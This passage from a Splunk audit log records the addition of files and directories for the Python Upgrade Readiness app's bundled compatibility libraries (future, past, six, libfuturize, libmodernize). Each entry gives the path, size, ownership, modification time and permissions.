18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.218, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/html", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.214, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/dbm", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.208, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/copyreg.py", isdir=0, size=165, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.204, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/configparser.py", isdir=0, size=146, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.200, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/collections.py", isdir=0, size=417, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.195, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/builtins.py", isdir=0, size=281, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.190, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/_thread.py", isdir=0, size=163, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.186, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/_markupbase.py", isdir=0, size=171, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.181, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/_dummy_thread.py", isdir=0, size=175, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.177, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/__init__.py", isdir=0, size=220, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.972, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.968, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.963, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.960, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/standard_library", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.956, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.953, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.949, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.945, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/__init__.py", isdir=0, size=2967, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.940, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then/futures_then.py", isdir=0, size=7115, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.935, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then/__init__.py", isdir=0, size=72, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.831, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/types/oldstr.py", isdir=0, size=4273, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.827, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/types/olddict.py", isdir=0, size=2721, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.824, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/types/basestring.py", isdir=0, size=728, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.820, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/types/__init__.py", isdir=0, size=879, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.817, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/translation/__init__.py", isdir=0, size=18417, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.813, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/tests/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.810, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/builtins/noniterators.py", isdir=0, size=9371, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.807, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/builtins/misc.py", isdir=0, size=2499, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.803, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/builtins/__init__.py", isdir=0, size=1805, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.799, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/utils/__init__.py", isdir=0, size=2633, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.795, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.790, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/types", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.786, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/translation", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.783, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.778, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/builtins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.773, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past/__init__.py", isdir=0, size=2943, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.669, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then-0.1.1.dist-info/top_level.txt", isdir=0, size=13, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.665, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then-0.1.1.dist-info/WHEEL", isdir=0, size=93, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.662, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then-0.1.1.dist-info/RECORD", isdir=0, size=679, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.658, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then-0.1.1.dist-info/METADATA", isdir=0, size=847, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.654, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then-0.1.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.650, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six-1.12.0.dist-info/top_level.txt", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.646, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six-1.12.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.642, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six-1.12.0.dist-info/RECORD", isdir=0, size=552, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.638, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six-1.12.0.dist-info/METADATA", isdir=0, size=1940, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.634, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six-1.12.0.dist-info/LICENSE", isdir=0, size=1066, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.630, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six-1.12.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.526, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_xrange_with_import.py", isdir=0, size=479, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.520, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_unicode_literals_import.py", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.514, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_unicode_keep_u.py", isdir=0, size=779, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.508, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_remove_old__future__imports.py", isdir=0, size=851, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.503, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_raise.py", isdir=0, size=2167, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.497, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_print_with_import.py", isdir=0, size=735, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.493, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_print.py", isdir=0, size=3384, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.489, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_order___future__imports.py", isdir=0, size=829, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.485, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_oldstr_wrap.py", isdir=0, size=1214, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.482, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_object.py", isdir=0, size=407, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.478, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_next_call.py", isdir=0, size=3158, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.475, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_metaclass.py", isdir=0, size=9568, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.471, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_future_standard_library_urllib.py", isdir=0, size=1001, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.467, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_future_standard_library.py", isdir=0, size=733, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.464, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_future_builtins.py", isdir=0, size=2027, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.460, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_execfile.py", isdir=0, size=921, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.456, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_division_safe.py", isdir=0, size=3460, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.452, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_division.py", isdir=0, size=228, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.446, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_cmp.py", isdir=0, size=701, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.442, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_bytes.py", isdir=0, size=685, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.438, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_basestring.py", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.435, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_add__future__imports_except_unicode_literals.py", isdir=0, size=662, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.431, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_absolute_import.py", isdir=0, size=3140, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.427, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/fix_UserDict.py", isdir=0, size=3840, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.421, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes/__init__.py", isdir=0, size=5141, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.216, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/main.py", isdir=0, size=13733, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.212, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.208, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/fixer_util.py", isdir=0, size=17494, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.204, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize/__init__.py", isdir=0, size=31, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.100, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_zip.py", isdir=0, size=560, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.096, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_xrange_six.py", isdir=0, size=545, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.092, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_urllib_six.py", isdir=0, size=8835, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.086, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_unicode_type.py", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.083, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_unicode_future.py", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.079, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_unicode.py", isdir=0, size=653, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.076, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_unichr.py", isdir=0, size=473, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.072, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_raise_six.py", isdir=0, size=800, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.069, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_raise.py", isdir=0, size=794, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.065, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_print.py", isdir=0, size=317, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.062, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_open.py", isdir=0, size=408, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.058, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_next.py", isdir=0, size=658, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.048, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_metaclass.py", isdir=0, size=8616, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.044, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_map.py", isdir=0, size=634, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.041, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_itertools_six.py", isdir=0, size=2074, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.037, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_itertools_imports_six.py", isdir=0, size=2407, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.033, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_int_long_tuple.py", isdir=0, size=559, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.029, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_input_six.py", isdir=0, size=1262, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.024, user=n/a, 